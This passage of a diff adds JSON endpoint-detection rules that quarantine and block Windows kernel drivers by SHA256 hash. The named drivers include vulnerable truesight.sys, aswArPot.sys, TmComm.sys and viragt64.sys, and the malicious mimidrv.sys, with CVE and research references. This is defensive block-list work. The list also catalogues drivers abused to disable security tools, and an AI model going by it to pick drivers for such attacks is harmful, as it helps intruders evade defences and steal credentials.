+ "creation_date": "2026-03-23T11:45:31.496057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.496063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49e6c9a0b3d0e5c6141cdeb33c767d05eccc063e742bc49759ab1f36b04064af",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc78bd8b-1b82-5f69-834b-5eba7ba9e08f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462584Z",
+ "creation_date": "2026-03-23T11:45:30.462587Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462596Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcd026fd2ff8d517e2779d67b3d2d5f9a7aa39f19c66fa8ff2cab66d5c6461c6",
+ "comment": "Vulnerable Kernel Driver (aka yyprotect64.sys) [https://www.loldrivers.io/drivers/12ccd18a-11da-495a-b4b4-98a2f2bff180/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc8e3dc7-a375-5e8c-89d4-5c34bc2380ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816240Z",
+ "creation_date": "2026-03-23T11:45:31.816243Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97b180382d816c8f3f507d946a7f519f5d319e9de97a8ce56f4a447e9ab2ef54",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc994e02-e98f-5d16-b93c-9146b6491e46",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142747Z",
+ "creation_date": "2026-03-23T11:45:32.142749Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142755Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0fe75edf9d4bdceb2dd9e4919a3b10f9d3305065862288cad09beb4f385f5410",
+ "comment": "Vulnerable IKARUS anti.virus Driver (aka ntguard.sys and ntguard_x64.sys) [https://www.greyhathacker.net/?p=995, https://www.exploit-db.com/exploits/43139] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc9ea2c4-7bdd-589f-a1c4-c3a77d053de4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475674Z",
+ "creation_date": "2026-03-23T11:45:30.475678Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475686Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e219276a4068b1eea5ce08f83a322845dce4eca89e05c71a0c2417065ce48813",
+ "comment": "Vulnerable Kernel Driver (aka directio64.sys) [https://www.loldrivers.io/drivers/a254e684-f6eb-40c4-a50a-7b76feb6cc02/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dcad2987-98ae-5a0a-8118-9d1c45a3190b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821076Z",
+ "creation_date": "2026-03-23T11:45:31.821078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7bc0a85db87d08a0dda93cbece19ce70935bac4a44452bb1c3658657d1204755",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dcaef3cf-2013-56bd-b328-535dc5180f8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973518Z",
+ "creation_date": "2026-03-23T11:45:29.973520Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973525Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2afdb3278a7b57466a103024aef9ff7f41c73a19bab843a8ebf3d3c4d4e82b30",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dcb19b73-9469-5fa5-8b16-18a8950388e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982886Z",
+ "creation_date": "2026-03-23T11:45:29.982888Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982894Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "786f0ba14567a7e19192645ad4e40bee6df259abf2fbdfda35b6a38f8493d6cc",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dcb50a31-e2bb-5a8d-b3e1-ad1361176008",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155889Z",
+ "creation_date": "2026-03-23T11:45:31.155891Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed4f8a397efd1c69890accc39c3b17d9914add78e8ed14f7225252834d9ee434",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dcd39f18-6233-5d23-bee1-2d34a63cd44f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493542Z",
+ "creation_date": "2026-03-23T11:45:31.493545Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c28d0a74e1d185b36de46a4aa356d13900f3549efc0c930c0cbe91fac8a990d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dcd5b66d-7f03-58c4-91a3-4a9b8ff4cdc9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157334Z",
+ "creation_date": "2026-03-23T11:45:31.157336Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157342Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "edd412e4406e2b863c48c4aca4192a63f4a9617f93eccea8c82c735629a2f38b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dce66a4f-9eef-5b97-a470-95bf7bb1f25a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831254Z",
+ "creation_date": "2026-03-23T11:45:30.831256Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da00248fe367e7d220824c27f2bd02e2bb3ea467fd76d3cdfee8f62e5d83cbcb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dce88221-6fca-567c-b0ee-4ebed5fd8d88",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477773Z",
+ "creation_date": "2026-03-23T11:45:31.477777Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477786Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7666194867593ceaf7a3349f0edf794c46b58a2b15cb957ddd00c526acde7c6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dcf7fb18-4540-5118-b212-12056498abf4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142790Z",
+ "creation_date": "2026-03-23T11:45:32.142792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142798Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "592979e894d4c0af645e0bd70d23333facbb7c5b7e35e9b19a9acd564aa97c09",
+ "comment": "Vulnerable VirIT Agent System Driver (aka viragt64.sys) [https://www.trendmicro.com/en_no/research/24/a/kasseika-ransomware-deploys-byovd-attacks-abuses-psexec-and-expl.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd13aa27-0a09-557f-8e2e-9d7814869057",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823519Z",
+ "creation_date": "2026-03-23T11:45:30.823521Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823527Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9dada726191185a41663f42cee4cb63eca0cf6ec6204fec8851c1dce940e217b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd1e3335-5f2c-59e4-8afc-68d5d62793ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463756Z",
+ "creation_date": "2026-03-23T11:45:30.463760Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463768Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10ad50fcb360dcab8539ea322aaf2270565dc835b7535790937348523d723d6b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd27cfac-bf08-50cf-9c50-fe0889c21411",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810611Z",
+ "creation_date": "2026-03-23T11:45:31.810613Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810618Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85ad9817ec0f48919fd21bcc911888b06f289c6ccdf28566c3cfcbd1c66c526c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd30c565-5ede-54b1-900a-f91e6bc8d323",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812813Z",
+ "creation_date": "2026-03-23T11:45:31.812816Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812825Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3b00d5e6e0e37ecb2498274d84feba9fe87376241112e6605a397b2f8852f98",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd3dcbf6-25e1-5fb0-84dc-cdfa4b7a71a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823155Z",
+ "creation_date": "2026-03-23T11:45:31.823158Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8f09a7c1c7fac1ed11ce285ab6b8e1635b645ca7dfffd4cd165cbe36d99e80b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd519426-73e9-5f9a-a14f-ac15681728ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141201Z",
+ "creation_date": "2026-03-23T11:45:31.141203Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141209Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04b9dc21b67e08fa55fb644e7758cbef7e2dcf81c065bb70fe122c79e80b5c51",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd5f9a2b-69b1-59a5-b0b1-2fe89c52cd1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969058Z",
+ "creation_date": "2026-03-23T11:45:29.969060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4522e2cfa0b1f5d258a3cf85b87681d6969e0572f668024c465d635c236b5d9",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd6f857b-a102-502d-bee4-1655f980d644",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812152Z",
+ "creation_date": "2026-03-23T11:45:31.812154Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab1d2a46a4ebb992992bdf59226829ac72cfcf81fc0a3c15791a397bc4737673",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dd76943a-1a27-5c00-957c-b61c1cab493e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476757Z",
+ "creation_date": "2026-03-23T11:45:31.476761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
